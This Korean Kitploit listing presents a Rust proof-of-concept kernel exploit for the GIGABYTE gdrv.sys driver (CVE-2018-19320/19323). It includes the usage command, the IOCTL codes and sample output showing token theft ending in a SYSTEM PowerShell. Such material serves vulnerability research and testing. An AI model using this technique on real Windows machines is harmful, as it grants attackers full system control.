Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2018-1932X — CVE-2018-1932X 커널 드라이버 취약점을 위한 Rust PoC | Kitploit
도구/GitHubGitHub/bkreisel/cve-2018-1932x
Privilege EscalationVulnerability AnalysisExploitationPost-ExploitationPayload DevelopmentBinary Exploitation
GitHubbkreisel/cve-2018-1932x

CVE-2018-1932X

CVE-2018-1932X 커널 드라이버 취약점을 위한 Rust PoC

저장소 보기
33년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2018-1932X (Rust 익스플로잇 POC) - GIGABYTE APP Center v1.05.21 및 이전 버전

대상이 메모리 안전하지 않다고 해서 익스플로잇까지 그래야 하는 것은 아닙니다!

사용된 취약점:

  • CVE-2018-19320 - ring0 memcpy 유사 기능
  • CVE-2018-19323 - MSR(모델 특정 레지스터) 읽기 및 쓰기

테스트 환경:

  • 20H1: Windows 10 Kernel Version 19041 MP (1 procs) Free x64

참고 자료

  • Vergilius 프로젝트: 커널 구조체
  • 기가바이트 패치 공지
  • _KPCR 상세

요구 사항

  • x64 전용
  • 위 빌드 번호에서 테스트됨
  • 로드된 GIGABYTE 드라이버: gdrv.sys

사용법

.\CVE-2018-1932X.exe

예시

root@kitploit:~
PS Z:\CVE-2018-1932X\target\debug> .\CVE-2018-1932X.exe
CVE-2019-1932X

Opening Handle to Kernel Driver: \\.\GIO
Acquired Handle: 0xa8
Sending IOCTL: 0xc3502580 with 0x10 bytes of data
  [+] Leaked   _KPCR: ffffe48159d88000
  [*] Address  _KPCRB: ffffe48159d88020
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _KPRCB: ffffe48159d88180
  [*] Address  _KTHREAD: ffffe48159d88188
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _KTHREAD: ffffb50b14d16080
  [*] Address  _KPROCESS: ffffb50b14d162a0
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _KPROCESS: ffffb50b1507f080
  [*] Address  PID: ffffb50b1507f4c0
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   PID: 2092
  [+] Known    PID: 2092
Walking Active Process Links...
  [*] Address  ActiveProcessLinks.Flink: ffffb50b1507f4c8 (PID: 82c)
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _EPROCESS: fffff8015561e060 (PID: 0)
  [*] Address  ActiveProcessLinks.Flink: fffff8015561e060 (PID: 0)
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Leaked   _EPROCESS: ffffb50b100624c8 (PID: 4)
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Current Token: ffff9708cac8306e
  [+] System  Token: ffff9708c567b047
Borrowing SYSTEM Token...
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
  [+] Current Token: ffff9708c567b047
Spawning Process...
  [+] Spawned SYSTEM Process
Closing Handle to Kernel Driver: \\.\GIO

생성된 PowerShell:

root@kitploit:~
PS C:\> whoami
nt authority\system

취약한 블록

Memcpy (IOCTL 0x0C3502808)

Memcpy Code Blocks

MSR 조작 (IOCTL 0x0C3502580)

MSR Code Blocks

도구 다운로드